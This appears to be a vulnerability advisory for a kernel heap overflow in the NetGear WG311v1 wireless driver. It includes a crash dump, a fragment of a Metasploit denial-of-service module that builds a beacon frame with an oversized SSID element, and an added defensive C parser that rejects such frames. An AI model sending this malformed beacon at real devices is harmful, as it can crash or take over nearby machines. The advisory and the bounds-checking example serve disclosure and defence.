MOKB-22-11-2006

Bug details
Title: NetGear WG311v1 Wireless Driver Long SSID Overflow
Description: The NetGear WG311v1 wireless adapter (PCI) ships with a version of the WG311ND5.SYS driver that is vulnerable to a heap-based buffer overflow when it parses a beacon frame carrying an over-long SSID information element. Because the driver runs in kernel mode, this issue may lead to arbitrary kernel-mode code execution (1). NetGear was NOT contacted about this flaw.

WG311v1 Driver Download (vulnerable)
Author/Contributor: Laurent Butti <laurent.butti [at] orange-ftgroup.com> - discovery and exploit development.
NA <NA [at] info-pull.com> - MoKB release.
References:
Proof of concept or exploit: Metasploit Module: auxiliary/dos/wireless/netgear_wg311pci.rb
Debugging information:

This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI adapter.
Although this driver is for the Windows operating system, Linux and FreeBSD users of the ndiswrapper tool should determine if they are using WG311ND5.SYS and upgrade accordingly.

1: A remote code execution module for Metasploit is also in development, so this release may be updated as necessary.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 81cae7b0, The pool entry we were looking for within the page.
Arg3: 81cae8c8, The next pool entry.
Arg4: 0a23002b, (reserved)

------------- framework3/trunk/modules/auxiliary/dos/wireless/netgear_wg311pci.rb
		frame = 
			"\x50" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			"\x64\x00" + 	              # beacon interval
			"\x01\x00" +	              # capabilities

			# SSID IE overflow
			"\x00" + "\xff" + ("\x41" * 255) +

			# supported rates IE
			"\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +

			# channel IE
			"\x03" + "\x01" + channel.chr
------------- framework3/trunk/modules/auxiliary/dos/wireless/netgear_wg311pci.rb
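Added example, written for this page and not part of the advisory or of the Metasploit module: a bounds-checked parser for the tagged parameters of an 802.11 beacon, the check that a driver must apply before copying an SSID into a fixed-size buffer. The frame bytes are constructed here to follow the layout shown in the module fragment (24-byte management header, 12 bytes of fixed fields, then SSID / supported-rates / channel IEs); the 32-octet SSID limit is the one defined by IEEE 802.11; the function names, return codes and the 512-byte scratch buffer are this example's own choices. The parser rejects an IE whose length byte runs past the end of the frame, and rejects an SSID IE longer than 32 octets instead of copying it.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IEEE80211_HDR_LEN  24   /* frame control, duration, 3 addresses, sequence control */
#define BEACON_FIXED_LEN   12   /* timestamp(8) + beacon interval(2) + capability(2) */
#define IE_SSID            0x00
#define SSID_MAX_LEN       32   /* IEEE 802.11: SSID element carries 0..32 octets */

enum ie_status { IE_OK = 0, IE_TRUNCATED = -1, IE_SSID_TOO_LONG = -2, IE_NO_SSID = -3 };

struct ssid { uint8_t len; uint8_t data[SSID_MAX_LEN]; };

/* Walk the IEs of a beacon body: each is id(1) length(1) value(length).
 * The length byte is attacker-controlled, so it is checked against the bytes left
 * in the frame before it is trusted, and an SSID is checked against the 32-octet
 * cap before anything is copied into the fixed-size destination. */
int parse_beacon_ssid(const uint8_t *frame, size_t frame_len, struct ssid *out)
{
    size_t off = IEEE80211_HDR_LEN + BEACON_FIXED_LEN;
    int found = 0;
    if (frame_len < off) return IE_TRUNCATED;
    while (off + 2 <= frame_len) {
        uint8_t id  = frame[off];
        uint8_t len = frame[off + 1];
        if (len > frame_len - off - 2) return IE_TRUNCATED;   /* IE claims more than the frame holds */
        if (id == IE_SSID) {
            if (len > SSID_MAX_LEN) return IE_SSID_TOO_LONG;  /* the check a vulnerable parser lacks */
            out->len = len;
            memcpy(out->data, frame + off + 2, len);
            found = 1;
        }
        off += 2 + (size_t)len;
    }
    if (off != frame_len) return IE_TRUNCATED;                /* dangling byte after the last IE */
    return found ? IE_OK : IE_NO_SSID;
}

/* Constructed sample beacon (not captured traffic) in the layout of the module fragment.
 * ssid_len_field is the SSID IE's length byte; ssid_bytes is how many bytes actually follow it. */
static size_t build_beacon(uint8_t *buf, size_t cap, uint8_t ssid_len_field, size_t ssid_bytes)
{
    static const uint8_t rates[] = {0x01, 0x08, 0x02, 0x04, 0x0b, 0x16, 0x0c, 0x18, 0x30, 0x48};
    static const uint8_t chan[]  = {0x03, 0x01, 0x06};
    size_t n;
    if (cap < IEEE80211_HDR_LEN + BEACON_FIXED_LEN + 2 + ssid_bytes + sizeof rates + sizeof chan)
        return 0;
    memset(buf, 0, IEEE80211_HDR_LEN + BEACON_FIXED_LEN);
    buf[0] = 0x50;                    /* management frame, subtype beacon */
    memset(buf + 4, 0xff, 6);         /* dst: broadcast */
    memset(buf + 10, 0x02, 6);        /* src and bssid: constructed locally administered address */
    memset(buf + 16, 0x02, 6);
    n = IEEE80211_HDR_LEN;
    buf[n + 8]  = 0x64;               /* beacon interval 100 TU, little endian */
    buf[n + 10] = 0x01;               /* capability: ESS */
    n += BEACON_FIXED_LEN;
    buf[n++] = IE_SSID;
    buf[n++] = ssid_len_field;
    memset(buf + n, 'A', ssid_bytes); n += ssid_bytes;
    memcpy(buf + n, rates, sizeof rates); n += sizeof rates;
    memcpy(buf + n, chan, sizeof chan);   n += sizeof chan;
    return n;
}

/* 0 = well-formed 8-octet SSID, 1 = SSID IE with length byte 0xff and 255 bytes (the
 * advisory's case), 2 = SSID IE whose length byte claims more bytes than the frame holds. */
int check_sample(int which)
{
    uint8_t buf[512];
    struct ssid s;
    size_t len;
    switch (which) {
    case 0:  len = build_beacon(buf, sizeof buf, 8, 8);      break;
    case 1:  len = build_beacon(buf, sizeof buf, 0xff, 255); break;
    default: len = build_beacon(buf, sizeof buf, 0xff, 8);   break;
    }
    return parse_beacon_ssid(buf, len, &s);
}

int main(void)
{
    for (int i = 0; i < 3; i++)
        printf("sample %d -> status %d\n", i, check_sample(i));
    return 0;
}
```

The two length checks are independent: the first keeps the parser inside the received frame, the second keeps the copy inside the destination buffer. A frame can pass the first and still fail the second, which is exactly the 255-byte SSID case the bugcheck above records.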